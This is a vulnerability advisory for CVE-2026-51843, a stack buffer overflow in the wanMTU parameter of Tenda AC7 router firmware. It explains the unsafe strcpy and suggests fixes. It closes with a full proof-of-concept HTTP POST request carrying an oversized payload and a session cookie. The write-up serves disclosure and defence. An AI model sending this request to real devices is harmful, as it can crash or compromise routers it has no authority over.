CVE-2026-51843

An attacker on the same network as the router sends a crafted HTTP POST request to `/goform/AdvSetMacMtuWan` with an overly long `wanMTU` value [ref_id=1]. Because `strcpy` performs no bounds checking, the oversized input overflows the stack buffer, potentially leading to denial of service or remote code execution [ref_id=1]. The attacker must be able to reach the router's web interface (typically on the LAN side) and does not require authentication beyond the session cookie shown in the PoC [ref_id=1].

The vulnerability resides in the `/goform/AdvSetMacMtuWan` interface of the Tenda AC7 router firmware v15.03.06.44. The `check_param_changed` function obtains the user-controlled `wanMTU` parameter and copies it into a stack buffer using the unsafe `strcpy` function, which does not validate or limit the length of the input data [ref_id=1].

The advisory does not provide a patch or official fix [ref_id=1]. To remediate the vulnerability, the developer should replace the unsafe `strcpy` call with a bounded copy function such as `strncpy` or `snprintf`, or validate the length of the `wanMTU` input before copying it into the stack buffer [ref_id=1]. Without such changes, the device remains vulnerable to stack buffer overflow attacks.

The bundle includes a PoC HTTP request. An attacker can reproduce the overflow by sending the following POST request to the router:

``` POST /goform/AdvSetMacMtuWan HTTP/1.1 Host: 192.168.0.1 Content-Length: 712 X-Requested-With: XMLHttpRequest Accept-Language: zh-CN,zh;q=0.9 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Origin: http://192.168.0.1 Referer: http://192.168.0.1/mac_clone.html?random=0.6216016377171282& Accept-Encoding: gzip, deflate, br Cookie: password=pmp1qw Connection: keep-alive

wanMTU=1AAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wanSpeed=0&cloneType=0&mac=B4:0F:3B:2E:64:19 ``` [ref_id=1]